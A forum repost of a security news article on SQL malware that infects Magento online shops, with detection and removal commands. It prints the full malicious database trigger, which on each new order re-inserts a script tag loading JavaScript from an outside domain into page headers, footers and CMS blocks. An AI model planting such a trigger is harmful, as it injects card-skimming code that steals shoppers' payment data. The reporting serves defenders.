Jump to content
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
NickTheGreek

A new SQL malware Targets online shops running on Magento

Recommended Posts

Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL.

The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

magento.jpg?resize=500%2C260

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags).

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once discovered the malicious trigger it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		value, 
		CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	) 
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';\

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		content, 
		CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	);
END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

 

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×